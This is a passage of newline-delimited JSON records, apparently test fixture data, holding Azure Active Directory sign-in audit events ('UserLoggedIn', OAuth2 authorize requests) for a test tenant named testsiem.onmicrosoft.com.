"b86ab9d4-fcf1-4b11-8a06-7a8f91b47fbd", "RecordType": 15, "ActorIpAddress": "175.16.199.1", "UserId": "asr@testsiem.onmicrosoft.com", "UserType": 0, "UserKey": "1003200096971F55@testsiem.onmicrosoft.com", "ClientIP": "175.16.199.1", "ApplicationId": "4345a7b9-9a63-4910-a426-35363201d503", "SupportTicketId": "", "Workload": "AzureActiveDirectory", "Target": [{"Type": 0, "ID": "00000002-0000-0000-c000-000000000000"}], "ObjectId": "00000002-0000-0000-c000-000000000000", "ModifiedProperties": [], "ResultStatus": "Succeeded", "IntraSystemId": "bfe22fb6-c763-4972-91a7-5b13d3d51400", "ExtendedProperties": [{"Name": "UserAgent", "Value": "Mozilla/5.0 (Macintosh; Intel Mac OS X 10.14; rv:72.0) Gecko/20100101 Firefox/72.0"}, {"Name": "UserAuthenticationMethod", "Value": "9"}, {"Name": "RequestType", "Value": "OAuth2:Authorize"}, {"Name": "ResultStatusDetail", "Value": "Success"}, {"Name": "KeepMeSignedIn", "Value": "False"}], "TargetContextId": "b86ab9d4-fcf1-4b11-8a06-7a8f91b47fbd", "AzureActiveDirectoryEventType": 1, "Operation": 
"UserLoggedIn", "Id": "d4f90f07-f5c4-4b36-a81c-6c9bae8660d6"} +{"InterSystemsId": "aca3d9a3-792d-4357-87c6-ef50c3215baa", "OrganizationId": "b86ab9d4-fcf1-4b11-8a06-7a8f91b47fbd", "CreationTime": "2020-02-09T15:28:52", "Actor": [{"Type": 0, "ID": "755e500a-6c03-46b0-b53b-282f23374e3b"}, {"Type": 5, "ID": "asr@testsiem.onmicrosoft.com"}, {"Type": 3, "ID": "1003200096971F55"}], "Version": 1, "ActorContextId": "b86ab9d4-fcf1-4b11-8a06-7a8f91b47fbd", "RecordType": 15, "ActorIpAddress": "175.16.199.1", "UserId": "asr@testsiem.onmicrosoft.com", "UserType": 0, "UserKey": "1003200096971F55@testsiem.onmicrosoft.com", "ClientIP": "175.16.199.1", "ApplicationId": "89bee1f7-5e6e-4d8a-9f3d-ecd601259da7", "SupportTicketId": "", "Workload": "AzureActiveDirectory", "Target": [{"Type": 0, "ID": "5f09333a-842c-47da-a157-57da27fcbca5"}], "ObjectId": "5f09333a-842c-47da-a157-57da27fcbca5", "ModifiedProperties": [], "ResultStatus": "Succeeded", "IntraSystemId": "f67a1615-4606-4673-b6fb-68f714fa2200", "ExtendedProperties": [{"Name": "UserAgent", "Value": "Mozilla/5.0 (Macintosh; Intel Mac OS X 10.14; rv:72.0) Gecko/20100101 Firefox/72.0"}, {"Name": "UserAuthenticationMethod", "Value": "9"}, {"Name": "RequestType", "Value": "OAuth2:Authorize"}, {"Name": "ResultStatusDetail", "Value": "Redirect"}, {"Name": "KeepMeSignedIn", "Value": "True"}], "TargetContextId": "b86ab9d4-fcf1-4b11-8a06-7a8f91b47fbd", "AzureActiveDirectoryEventType": 1, "Operation": "UserLoggedIn", "Id": "d2ad235b-d73f-4bd8-8aef-6e4909ee1b7c"} +{"InterSystemsId": "ae211253-88cf-4921-9014-2f9beab64fb0", "OrganizationId": "b86ab9d4-fcf1-4b11-8a06-7a8f91b47fbd", "CreationTime": "2020-02-10T15:13:37", "Actor": [{"Type": 0, "ID": "755e500a-6c03-46b0-b53b-282f23374e3b"}, {"Type": 5, "ID": "asr@testsiem.onmicrosoft.com"}, {"Type": 3, "ID": "1003200096971F55"}], "Version": 1, "ActorContextId": "b86ab9d4-fcf1-4b11-8a06-7a8f91b47fbd", "RecordType": 15, "ActorIpAddress": "175.16.199.1", "UserId": "asr@testsiem.onmicrosoft.com", 
"UserType": 0, "UserKey": "1003200096971F55@testsiem.onmicrosoft.com", "ClientIP": "175.16.199.1", "ApplicationId": "89bee1f7-5e6e-4d8a-9f3d-ecd601259da7", "SupportTicketId": "", "Workload": "AzureActiveDirectory", "Target": [{"Type": 0, "ID": "5f09333a-842c-47da-a157-57da27fcbca5"}], "ObjectId": "5f09333a-842c-47da-a157-57da27fcbca5", "ModifiedProperties": [], "ResultStatus": "Succeeded", "IntraSystemId": "ccfec0f3-498b-43b1-a4c0-fb42f0fb5300", "ExtendedProperties": [{"Name": "UserAgent", "Value": "Mozilla/5.0 (Macintosh; Intel Mac OS X 10.14; rv:72.0) Gecko/20100101 Firefox/72.0"}, {"Name": "UserAuthenticationMethod", "Value": "9"}, {"Name": "RequestType", "Value": "OAuth2:Authorize"}, {"Name": "ResultStatusDetail", "Value": "Redirect"}, {"Name": "KeepMeSignedIn", "Value": "False"}], "TargetContextId": "b86ab9d4-fcf1-4b11-8a06-7a8f91b47fbd", "AzureActiveDirectoryEventType": 1, "Operation": "UserLoggedIn", "Id": "8ff18278-32ca-49d1-8658-91e577e0854f"} +{"InterSystemsId": "b3997fcc-6b0e-45b1-b88d-b4ee4a8a7ddc", "OrganizationId": "b86ab9d4-fcf1-4b11-8a06-7a8f91b47fbd", "CreationTime": "2020-02-09T15:28:52", "Actor": [{"Type": 0, "ID": "755e500a-6c03-46b0-b53b-282f23374e3b"}, {"Type": 5, "ID": "asr@testsiem.onmicrosoft.com"}, {"Type": 3, "ID": "1003200096971F55"}], "Version": 1, "ActorContextId": "b86ab9d4-fcf1-4b11-8a06-7a8f91b47fbd", "RecordType": 15, "ActorIpAddress": "175.16.199.1", "UserId": "asr@testsiem.onmicrosoft.com", "UserType": 0, "UserKey": "1003200096971F55@testsiem.onmicrosoft.com", "ClientIP": "175.16.199.1", "ApplicationId": "89bee1f7-5e6e-4d8a-9f3d-ecd601259da7", "SupportTicketId": "", "Workload": "AzureActiveDirectory", "Target": [{"Type": 0, "ID": "00000003-0000-0000-c000-000000000000"}], "ObjectId": "00000003-0000-0000-c000-000000000000", "ModifiedProperties": [], "ResultStatus": "Succeeded", "IntraSystemId": "c1ffa732-6576-4f86-9294-44387abc1f00", "ExtendedProperties": [{"Name": "UserAgent", "Value": "Mozilla/5.0 (Macintosh; Intel Mac OS X 
10.14; rv:72.0) Gecko/20100101 Firefox/72.0"}, {"Name": "UserAuthenticationMethod", "Value": "9"}, {"Name": "RequestType", "Value": "OAuth2:Authorize"}, {"Name": "ResultStatusDetail", "Value": "Redirect"}, {"Name": "KeepMeSignedIn", "Value": "True"}], "TargetContextId": "b86ab9d4-fcf1-4b11-8a06-7a8f91b47fbd", "AzureActiveDirectoryEventType": 1, "Operation": "UserLoggedIn", "Id": "a3939990-f7b4-4dc5-af4d-42b70a9485ea"} +{"InterSystemsId": "b3ab6d58-7b90-45d6-95e3-ee11333ebc34", "OrganizationId": "b86ab9d4-fcf1-4b11-8a06-7a8f91b47fbd", "CreationTime": "2020-02-10T15:13:01", "Actor": [{"Type": 0, "ID": "755e500a-6c03-46b0-b53b-282f23374e3b"}, {"Type": 5, "ID": "asr@testsiem.onmicrosoft.com"}, {"Type": 3, "ID": "1003200096971F55"}], "Version": 1, "ActorContextId": "b86ab9d4-fcf1-4b11-8a06-7a8f91b47fbd", "RecordType": 15, "ActorIpAddress": "175.16.199.1", "UserId": "asr@testsiem.onmicrosoft.com", "UserType": 0, "UserKey": "1003200096971F55@testsiem.onmicrosoft.com", "ClientIP": "175.16.199.1", "ApplicationId": "4345a7b9-9a63-4910-a426-35363201d503", "SupportTicketId": "", "Workload": "AzureActiveDirectory", "Target": [{"Type": 0, "ID": "00000002-0000-0000-c000-000000000000"}], "ObjectId": "00000002-0000-0000-c000-000000000000", "ModifiedProperties": [], "ResultStatus": "Succeeded", "IntraSystemId": "d949d6c2-472e-4901-bd70-96cb90424c00", "ExtendedProperties": [{"Name": "UserAgent", "Value": "Mozilla/5.0 (Macintosh; Intel Mac OS X 10.14; rv:72.0) Gecko/20100101 Firefox/72.0"}, {"Name": "UserAuthenticationMethod", "Value": "9"}, {"Name": "RequestType", "Value": "OAuth2:Authorize"}, {"Name": "ResultStatusDetail", "Value": "Success"}, {"Name": "KeepMeSignedIn", "Value": "False"}], "TargetContextId": "b86ab9d4-fcf1-4b11-8a06-7a8f91b47fbd", "AzureActiveDirectoryEventType": 1, "Operation": "UserLoggedIn", "Id": "61ba70f4-bd75-4bc2-a681-2e219d920e63"} +{"InterSystemsId": "b5c5fd00-b659-413e-8739-6271a4d70506", "OrganizationId": "b86ab9d4-fcf1-4b11-8a06-7a8f91b47fbd", 
"CreationTime": "2020-02-12T10:53:12", "Actor": [{"Type": 0, "ID": "755e500a-6c03-46b0-b53b-282f23374e3b"}, {"Type": 5, "ID": "asr@testsiem.onmicrosoft.com"}, {"Type": 3, "ID": "1003200096971F55"}], "Version": 1, "ActorContextId": "b86ab9d4-fcf1-4b11-8a06-7a8f91b47fbd", "RecordType": 15, "ActorIpAddress": "216.160.83.57", "UserId": "asr@testsiem.onmicrosoft.com", "UserType": 0, "UserKey": "1003200096971F55@testsiem.onmicrosoft.com", "ClientIP": "216.160.83.57", "ApplicationId": "80ccca67-54bd-44ab-8625-4b79c4dc7775", "SupportTicketId": "", "Workload": "AzureActiveDirectory", "Target": [{"Type": 0, "ID": "00000002-0000-0000-c000-000000000000"}], "ObjectId": "00000002-0000-0000-c000-000000000000", "ModifiedProperties": [], "ResultStatus": "Succeeded", "IntraSystemId": "fabbe34e-a6dd-46f8-805f-4ca633c2ae00", "ExtendedProperties": [{"Name": "UserAgent", "Value": "Mozilla/5.0 (Macintosh; Intel Mac OS X 10.14; rv:72.0) Gecko/20100101 Firefox/72.0"}, {"Name": "UserAuthenticationMethod", "Value": "9"}, {"Name": "RequestType", "Value": "OAuth2:Authorize"}, {"Name": "ResultStatusDetail", "Value": "Success"}, {"Name": "KeepMeSignedIn", "Value": "False"}], "TargetContextId": "b86ab9d4-fcf1-4b11-8a06-7a8f91b47fbd", "AzureActiveDirectoryEventType": 1, "Operation": "UserLoggedIn", "Id": "3e17bf8e-92de-45b6-b668-7618ab0e0c95"} +{"InterSystemsId": "b744259e-13e0-43d7-9f56-82cdbd54cf7c", "OrganizationId": "b86ab9d4-fcf1-4b11-8a06-7a8f91b47fbd", "CreationTime": "2020-02-12T10:52:06", "Actor": [{"Type": 0, "ID": "755e500a-6c03-46b0-b53b-282f23374e3b"}, {"Type": 5, "ID": "asr@testsiem.onmicrosoft.com"}, {"Type": 3, "ID": "1003200096971F55"}], "Version": 1, "ActorContextId": "b86ab9d4-fcf1-4b11-8a06-7a8f91b47fbd", "RecordType": 15, "ActorIpAddress": "216.160.83.57", "UserId": "asr@testsiem.onmicrosoft.com", "UserType": 0, "UserKey": "1003200096971F55@testsiem.onmicrosoft.com", "ClientIP": "216.160.83.57", "ApplicationId": "89bee1f7-5e6e-4d8a-9f3d-ecd601259da7", "SupportTicketId": "", 
"Workload": "AzureActiveDirectory", "Target": [{"Type": 0, "ID": "5f09333a-842c-47da-a157-57da27fcbca5"}], "ObjectId": "5f09333a-842c-47da-a157-57da27fcbca5", "ModifiedProperties": [], "ResultStatus": "Succeeded", "IntraSystemId": "ce9f104d-1a1b-488e-9313-b9729e99c400", "ExtendedProperties": [{"Name": "UserAgent", "Value": "Mozilla/5.0 (Macintosh; Intel Mac OS X 10.14; rv:72.0) Gecko/20100101 Firefox/72.0"}, {"Name": "UserAuthenticationMethod", "Value": "9"}, {"Name": "RequestType", "Value": "OAuth2:Authorize"}, {"Name": "ResultStatusDetail", "Value": "Redirect"}, {"Name": "KeepMeSignedIn", "Value": "False"}], "TargetContextId": "b86ab9d4-fcf1-4b11-8a06-7a8f91b47fbd", "AzureActiveDirectoryEventType": 1, "Operation": "UserLoggedIn", "Id": "f100d714-ffa2-4077-bf90-2f57a3b366c0"} +{"InterSystemsId": "b7d9a234-9fdd-4e36-9cf3-fd825f22697a", "OrganizationId": "b86ab9d4-fcf1-4b11-8a06-7a8f91b47fbd", "CreationTime": "2020-02-08T14:33:50", "Actor": [{"Type": 0, "ID": "755e500a-6c03-46b0-b53b-282f23374e3b"}, {"Type": 5, "ID": "asr@testsiem.onmicrosoft.com"}, {"Type": 3, "ID": "1003200096971F55"}], "Version": 1, "ActorContextId": "b86ab9d4-fcf1-4b11-8a06-7a8f91b47fbd", "RecordType": 15, "ActorIpAddress": "67.43.156.12", "UserId": "asr@testsiem.onmicrosoft.com", "UserType": 0, "UserKey": "1003200096971F55@testsiem.onmicrosoft.com", "ClientIP": "67.43.156.12", "ApplicationId": "89bee1f7-5e6e-4d8a-9f3d-ecd601259da7", "SupportTicketId": "", "Workload": "AzureActiveDirectory", "Target": [{"Type": 0, "ID": "Unknown"}], "ObjectId": "Unknown", "ModifiedProperties": [], "ResultStatus": "Succeeded", "IntraSystemId": "49092519-a590-4207-b1b3-1d49f9100a00", "ExtendedProperties": [{"Name": "UserAgent", "Value": "Mozilla/5.0 (Macintosh; Intel Mac OS X 10.14; rv:72.0) Gecko/20100101 Firefox/72.0"}, {"Name": "UserAuthenticationMethod", "Value": "9"}, {"Name": "RequestType", "Value": "OAuth2:Authorize"}, {"Name": "ResultStatusDetail", "Value": "Redirect"}, {"Name": "KeepMeSignedIn", "Value": 
"True"}], "TargetContextId": "b86ab9d4-fcf1-4b11-8a06-7a8f91b47fbd", "AzureActiveDirectoryEventType": 1, "Operation": "UserLoggedIn", "Id": "4b0f0d57-0766-4621-8aa0-04b8d8b63a78"} +{"InterSystemsId": "bb677f9e-953a-4bde-bb91-0ef8209200a1", "OrganizationId": "b86ab9d4-fcf1-4b11-8a06-7a8f91b47fbd", "CreationTime": "2020-02-10T15:13:38", "Actor": [{"Type": 0, "ID": "755e500a-6c03-46b0-b53b-282f23374e3b"}, {"Type": 5, "ID": "asr@testsiem.onmicrosoft.com"}, {"Type": 3, "ID": "1003200096971F55"}], "Version": 1, "ActorContextId": "b86ab9d4-fcf1-4b11-8a06-7a8f91b47fbd", "RecordType": 15, "ActorIpAddress": "175.16.199.1", "UserId": "asr@testsiem.onmicrosoft.com", "UserType": 0, "UserKey": "1003200096971F55@testsiem.onmicrosoft.com", "ClientIP": "175.16.199.1", "ApplicationId": "89bee1f7-5e6e-4d8a-9f3d-ecd601259da7", "SupportTicketId": "", "Workload": "AzureActiveDirectory", "Target": [{"Type": 0, "ID": "00000003-0000-0000-c000-000000000000"}], "ObjectId": "00000003-0000-0000-c000-000000000000", "ModifiedProperties": [], "ResultStatus": "Succeeded", "IntraSystemId": "1da3c318-642f-48dc-836b-e83b27655b00", "ExtendedProperties": [{"Name": "UserAgent", "Value": "Mozilla/5.0 (Macintosh; Intel Mac OS X 10.14; rv:72.0) Gecko/20100101 Firefox/72.0"}, {"Name": "UserAuthenticationMethod", "Value": "9"}, {"Name": "RequestType", "Value": "OAuth2:Authorize"}, {"Name": "ResultStatusDetail", "Value": "Redirect"}, {"Name": "KeepMeSignedIn", "Value": "False"}], "TargetContextId": "b86ab9d4-fcf1-4b11-8a06-7a8f91b47fbd", "AzureActiveDirectoryEventType": 1, "Operation": "UserLoggedIn", "Id": "8d9a1fa8-7b85-4c5d-9e96-5728d572fb95"} +{"InterSystemsId": "c355f078-53d7-4d60-b836-851a09a98208", "OrganizationId": "b86ab9d4-fcf1-4b11-8a06-7a8f91b47fbd", "CreationTime": "2020-02-07T16:44:05", "Actor": [{"Type": 0, "ID": "755e500a-6c03-46b0-b53b-282f23374e3b"}, {"Type": 5, "ID": "asr@testsiem.onmicrosoft.com"}, {"Type": 3, "ID": "1003200096971F55"}], "Version": 1, "ActorContextId": 
"b86ab9d4-fcf1-4b11-8a06-7a8f91b47fbd", "RecordType": 15, "ActorIpAddress": "81.2.69.143", "UserId": "asr@testsiem.onmicrosoft.com", "UserType": 0, "UserKey": "1003200096971F55@testsiem.onmicrosoft.com", "ClientIP": "81.2.69.143", "ApplicationId": "89bee1f7-5e6e-4d8a-9f3d-ecd601259da7", "SupportTicketId": "", "Workload": "AzureActiveDirectory", "Target": [{"Type": 0, "ID": "00000003-0000-0000-c000-000000000000"}], "ObjectId": "00000003-0000-0000-c000-000000000000", "ModifiedProperties": [], "ResultStatus": "Succeeded", "IntraSystemId": "20e56367-e902-4200-855b-2ef7b99e5f00", "ExtendedProperties": [{"Name": "UserAgent", "Value": "Mozilla/5.0 (Macintosh; Intel Mac OS X 10.14; rv:72.0) Gecko/20100101 Firefox/72.0"}, {"Name": "UserAuthenticationMethod", "Value": "9"}, {"Name": "RequestType", "Value": "OAuth2:Authorize"}, {"Name": "ResultStatusDetail", "Value": "Redirect"}, {"Name": "KeepMeSignedIn", "Value": "True"}], "TargetContextId": "b86ab9d4-fcf1-4b11-8a06-7a8f91b47fbd", "AzureActiveDirectoryEventType": 1, "Operation": "UserLoggedIn", "Id": "9756fe5b-ea0d-42fa-a665-be8e0eb100e5"} +{"InterSystemsId": "c5874ff2-7c53-4d51-9252-7abbf0524b1c", "OrganizationId": "b86ab9d4-fcf1-4b11-8a06-7a8f91b47fbd", "CreationTime": "2020-02-09T15:28:51", "Actor": [{"Type": 0, "ID": "755e500a-6c03-46b0-b53b-282f23374e3b"}, {"Type": 5, "ID": "asr@testsiem.onmicrosoft.com"}, {"Type": 3, "ID": "1003200096971F55"}], "Version": 1, "ActorContextId": "b86ab9d4-fcf1-4b11-8a06-7a8f91b47fbd", "RecordType": 15, "ActorIpAddress": "175.16.199.1", "UserId": "asr@testsiem.onmicrosoft.com", "UserType": 0, "UserKey": "1003200096971F55@testsiem.onmicrosoft.com", "ClientIP": "175.16.199.1", "ApplicationId": "89bee1f7-5e6e-4d8a-9f3d-ecd601259da7", "SupportTicketId": "", "Workload": "AzureActiveDirectory", "Target": [{"Type": 0, "ID": "Unknown"}], "ObjectId": "Unknown", "ModifiedProperties": [], "ResultStatus": "Succeeded", "IntraSystemId": "3188aef9-6b4e-44f2-8455-c28b49552200", "ExtendedProperties": 
[{"Name": "UserAgent", "Value": "Mozilla/5.0 (Macintosh; Intel Mac OS X 10.14; rv:72.0) Gecko/20100101 Firefox/72.0"}, {"Name": "UserAuthenticationMethod", "Value": "9"}, {"Name": "RequestType", "Value": "OAuth2:Authorize"}, {"Name": "ResultStatusDetail", "Value": "Redirect"}, {"Name": "KeepMeSignedIn", "Value": "True"}], "TargetContextId": "b86ab9d4-fcf1-4b11-8a06-7a8f91b47fbd", "AzureActiveDirectoryEventType": 1, "Operation": "UserLoggedIn", "Id": "abbf584f-b3a9-4b6d-9b37-4cc4b802ca4d"} +{"InterSystemsId": "cf2168a1-6537-4ed6-80a5-797c3458180c", "OrganizationId": "b86ab9d4-fcf1-4b11-8a06-7a8f91b47fbd", "CreationTime": "2020-02-09T15:25:21", "Actor": [{"Type": 0, "ID": "755e500a-6c03-46b0-b53b-282f23374e3b"}, {"Type": 5, "ID": "asr@testsiem.onmicrosoft.com"}, {"Type": 3, "ID": "1003200096971F55"}], "Version": 1, "ActorContextId": "b86ab9d4-fcf1-4b11-8a06-7a8f91b47fbd", "RecordType": 15, "ActorIpAddress": "175.16.199.1", "UserId": "asr@testsiem.onmicrosoft.com", "UserType": 0, "UserKey": "1003200096971F55@testsiem.onmicrosoft.com", "ClientIP": "175.16.199.1", "ApplicationId": "89bee1f7-5e6e-4d8a-9f3d-ecd601259da7", "SupportTicketId": "", "Workload": "AzureActiveDirectory", "Target": [{"Type": 0, "ID": "00000003-0000-0000-c000-000000000000"}], "ObjectId": "00000003-0000-0000-c000-000000000000", "ModifiedProperties": [], "ResultStatus": "Succeeded", "IntraSystemId": "23f53edd-63a7-4292-9d80-4fbc49c11e00", "ExtendedProperties": [{"Name": "UserAgent", "Value": "Mozilla/5.0 (Macintosh; Intel Mac OS X 10.14; rv:72.0) Gecko/20100101 Firefox/72.0"}, {"Name": "UserAuthenticationMethod", "Value": "9"}, {"Name": "RequestType", "Value": "OAuth2:Authorize"}, {"Name": "ResultStatusDetail", "Value": "Redirect"}, {"Name": "KeepMeSignedIn", "Value": "True"}], "TargetContextId": "b86ab9d4-fcf1-4b11-8a06-7a8f91b47fbd", "AzureActiveDirectoryEventType": 1, "Operation": "UserLoggedIn", "Id": "d137a5e4-7004-493a-acca-5fb167d1f207"} +{"InterSystemsId": 
"d21f6867-0670-4c94-b6fa-bde326fcf3c6", "OrganizationId": "b86ab9d4-fcf1-4b11-8a06-7a8f91b47fbd", "CreationTime": "2020-02-12T21:38:20", "Actor": [{"Type": 0, "ID": "755e500a-6c03-46b0-b53b-282f23374e3b"}, {"Type": 5, "ID": "asr@testsiem.onmicrosoft.com"}, {"Type": 3, "ID": "1003200096971F55"}], "Version": 1, "ActorContextId": "b86ab9d4-fcf1-4b11-8a06-7a8f91b47fbd", "RecordType": 15, "ActorIpAddress": "216.160.83.57", "UserId": "asr@testsiem.onmicrosoft.com", "UserType": 0, "UserKey": "1003200096971F55@testsiem.onmicrosoft.com", "ClientIP": "216.160.83.57", "ApplicationId": "89bee1f7-5e6e-4d8a-9f3d-ecd601259da7", "SupportTicketId": "", "Workload": "AzureActiveDirectory", "Target": [{"Type": 0, "ID": "Unknown"}], "ObjectId": "Unknown", "ModifiedProperties": [], "ResultStatus": "Succeeded", "IntraSystemId": "1fa4819f-605a-4ebe-a2c3-bc11c3f8e200", "ExtendedProperties": [{"Name": "UserAgent", "Value": "Mozilla/5.0 (Macintosh; Intel Mac OS X 10.14; rv:72.0) Gecko/20100101 Firefox/72.0"}, {"Name": "UserAuthenticationMethod", "Value": "9"}, {"Name": "RequestType", "Value": "OAuth2:Authorize"}, {"Name": "ResultStatusDetail", "Value": "Redirect"}, {"Name": "KeepMeSignedIn", "Value": "False"}], "TargetContextId": "b86ab9d4-fcf1-4b11-8a06-7a8f91b47fbd", "AzureActiveDirectoryEventType": 1, "Operation": "UserLoggedIn", "Id": "73f0a2ef-35be-4a71-9545-59d879fc8fb2"}
+{"InterSystemsId": "d5effb7f-9d39-4893-90f6-9cfeec7ed1a7", "OrganizationId": "b86ab9d4-fcf1-4b11-8a06-7a8f91b47fbd", "CreationTime": "2020-02-07T16:44:02", "Actor": [{"Type": 0, "ID": "755e500a-6c03-46b0-b53b-282f23374e3b"}, {"Type": 5, "ID": "asr@testsiem.onmicrosoft.com"}, {"Type": 3, "ID": "1003200096971F55"}], "Version": 1, "ActorContextId": "b86ab9d4-fcf1-4b11-8a06-7a8f91b47fbd", "RecordType": 15, "ActorIpAddress": "81.2.69.143", "UserId": "asr@testsiem.onmicrosoft.com", "UserType": 0, "UserKey": "1003200096971F55@testsiem.onmicrosoft.com", "ClientIP": "81.2.69.143", "ApplicationId": 
"89bee1f7-5e6e-4d8a-9f3d-ecd601259da7", "SupportTicketId": "", "Workload": "AzureActiveDirectory", "Target": [{"Type": 0, "ID": "Unknown"}], "ObjectId": "Unknown", "ModifiedProperties": [], "ResultStatus": "Succeeded", "IntraSystemId": "f22a3ad7-22e7-4296-a600-e4e9161a6000", "ExtendedProperties": [{"Name": "UserAgent", "Value": "Mozilla/5.0 (Macintosh; Intel Mac OS X 10.14; rv:72.0) Gecko/20100101 Firefox/72.0"}, {"Name": "UserAuthenticationMethod", "Value": "9"}, {"Name": "RequestType", "Value": "OAuth2:Authorize"}, {"Name": "ResultStatusDetail", "Value": "Redirect"}, {"Name": "KeepMeSignedIn", "Value": "True"}], "TargetContextId": "b86ab9d4-fcf1-4b11-8a06-7a8f91b47fbd", "AzureActiveDirectoryEventType": 1, "Operation": "UserLoggedIn", "Id": "3783acda-5ded-4d69-95b6-3df5344c0ce0"}
+{"InterSystemsId": "d960e058-1adb-4a84-a65b-1a6ce367e323", "OrganizationId": "b86ab9d4-fcf1-4b11-8a06-7a8f91b47fbd", "CreationTime": "2020-02-07T16:44:03", "Actor": [{"Type": 0, "ID": "755e500a-6c03-46b0-b53b-282f23374e3b"}, {"Type": 5, "ID": "asr@testsiem.onmicrosoft.com"}, {"Type": 3, "ID": "1003200096971F55"}], "Version": 1, "ActorContextId": "b86ab9d4-fcf1-4b11-8a06-7a8f91b47fbd", "RecordType": 15, "ActorIpAddress": "81.2.69.143", "UserId": "asr@testsiem.onmicrosoft.com", "UserType": 0, "UserKey": "1003200096971F55@testsiem.onmicrosoft.com", "ClientIP": "81.2.69.143", "ApplicationId": "89bee1f7-5e6e-4d8a-9f3d-ecd601259da7", "SupportTicketId": "", "Workload": "AzureActiveDirectory", "Target": [{"Type": 0, "ID": "5f09333a-842c-47da-a157-57da27fcbca5"}], "ObjectId": "5f09333a-842c-47da-a157-57da27fcbca5", "ModifiedProperties": [], "ResultStatus": "Succeeded", "IntraSystemId": "1dfdb693-18a1-4cff-aa3e-61feaa356100", "ExtendedProperties": [{"Name": "UserAgent", "Value": "Mozilla/5.0 (Macintosh; Intel Mac OS X 10.14; rv:72.0) Gecko/20100101 Firefox/72.0"}, {"Name": "UserAuthenticationMethod", "Value": "9"}, {"Name": "RequestType", "Value": "OAuth2:Authorize"}, {"Name": 
"ResultStatusDetail", "Value": "Redirect"}, {"Name": "KeepMeSignedIn", "Value": "True"}], "TargetContextId": "b86ab9d4-fcf1-4b11-8a06-7a8f91b47fbd", "AzureActiveDirectoryEventType": 1, "Operation": "UserLoggedIn", "Id": "f67568b1-64c4-4165-bdd9-16a5b9142eef"}
+{"InterSystemsId": "e2565aaf-91b0-4ccd-8810-743123eb7383", "OrganizationId": "b86ab9d4-fcf1-4b11-8a06-7a8f91b47fbd", "CreationTime": "2020-02-09T15:29:02", "Actor": [{"Type": 0, "ID": "755e500a-6c03-46b0-b53b-282f23374e3b"}, {"Type": 5, "ID": "asr@testsiem.onmicrosoft.com"}, {"Type": 3, "ID": "1003200096971F55"}], "Version": 1, "ActorContextId": "b86ab9d4-fcf1-4b11-8a06-7a8f91b47fbd", "RecordType": 15, "ActorIpAddress": "175.16.199.1", "UserId": "asr@testsiem.onmicrosoft.com", "UserType": 0, "UserKey": "1003200096971F55@testsiem.onmicrosoft.com", "ClientIP": "175.16.199.1", "ApplicationId": "89bee1f7-5e6e-4d8a-9f3d-ecd601259da7", "SupportTicketId": "", "Workload": "AzureActiveDirectory", "Target": [{"Type": 0, "ID": "5f09333a-842c-47da-a157-57da27fcbca5"}], "ObjectId": "5f09333a-842c-47da-a157-57da27fcbca5", "ModifiedProperties": [], "ResultStatus": "Succeeded", "IntraSystemId": "21166e08-6589-4c2d-a325-c97ba45f2200", "ExtendedProperties": [{"Name": "UserAgent", "Value": "Mozilla/5.0 (Macintosh; Intel Mac OS X 10.14; rv:72.0) Gecko/20100101 Firefox/72.0"}, {"Name": "UserAuthenticationMethod", "Value": "9"}, {"Name": "RequestType", "Value": "OAuth2:Authorize"}, {"Name": "ResultStatusDetail", "Value": "Redirect"}, {"Name": "KeepMeSignedIn", "Value": "True"}], "TargetContextId": "b86ab9d4-fcf1-4b11-8a06-7a8f91b47fbd", "AzureActiveDirectoryEventType": 1, "Operation": "UserLoggedIn", "Id": "a8114a24-d342-4689-b75e-51e6386763de"}
+{"InterSystemsId": "ede626b9-2035-4d02-8330-201c4ae82af6", "OrganizationId": "b86ab9d4-fcf1-4b11-8a06-7a8f91b47fbd", "CreationTime": "2020-02-09T15:25:21", "Actor": [{"Type": 0, "ID": "755e500a-6c03-46b0-b53b-282f23374e3b"}, {"Type": 5, "ID": "asr@testsiem.onmicrosoft.com"}, {"Type": 3, 
"ID": "1003200096971F55"}], "Version": 1, "ActorContextId": "b86ab9d4-fcf1-4b11-8a06-7a8f91b47fbd", "RecordType": 15, "ActorIpAddress": "175.16.199.1", "UserId": "asr@testsiem.onmicrosoft.com", "UserType": 0, "UserKey": "1003200096971F55@testsiem.onmicrosoft.com", "ClientIP": "175.16.199.1", "ApplicationId": "89bee1f7-5e6e-4d8a-9f3d-ecd601259da7", "SupportTicketId": "", "Workload": "AzureActiveDirectory", "Target": [{"Type": 0, "ID": "5f09333a-842c-47da-a157-57da27fcbca5"}], "ObjectId": "5f09333a-842c-47da-a157-57da27fcbca5", "ModifiedProperties": [], "ResultStatus": "Succeeded", "IntraSystemId": "98612804-9aa6-40a4-b72a-808bc7742000", "ExtendedProperties": [{"Name": "UserAgent", "Value": "Mozilla/5.0 (Macintosh; Intel Mac OS X 10.14; rv:72.0) Gecko/20100101 Firefox/72.0"}, {"Name": "UserAuthenticationMethod", "Value": "9"}, {"Name": "RequestType", "Value": "OAuth2:Authorize"}, {"Name": "ResultStatusDetail", "Value": "Redirect"}, {"Name": "KeepMeSignedIn", "Value": "True"}], "TargetContextId": "b86ab9d4-fcf1-4b11-8a06-7a8f91b47fbd", "AzureActiveDirectoryEventType": 1, "Operation": "UserLoggedIn", "Id": "1eaf9c65-8c67-4cd9-9277-771589113752"}
+{"InterSystemsId": "fc5c6c90-a6ba-486c-b685-8d67c529d3aa", "OrganizationId": "b86ab9d4-fcf1-4b11-8a06-7a8f91b47fbd", "CreationTime": "2020-02-07T16:43:39", "Actor": [{"Type": 0, "ID": "755e500a-6c03-46b0-b53b-282f23374e3b"}, {"Type": 5, "ID": "asr@testsiem.onmicrosoft.com"}, {"Type": 3, "ID": "1003200096971F55"}], "Version": 1, "ActorContextId": "b86ab9d4-fcf1-4b11-8a06-7a8f91b47fbd", "RecordType": 15, "ActorIpAddress": "81.2.69.143", "UserId": "asr@testsiem.onmicrosoft.com", "UserType": 0, "UserKey": "1003200096971F55@testsiem.onmicrosoft.com", "ClientIP": "81.2.69.143", "ApplicationId": "89bee1f7-5e6e-4d8a-9f3d-ecd601259da7", "SupportTicketId": "", "Workload": "AzureActiveDirectory", "Target": [{"Type": 0, "ID": "Unknown"}], "ObjectId": "Unknown", "ModifiedProperties": [], "ResultStatus": "Succeeded", "IntraSystemId": 
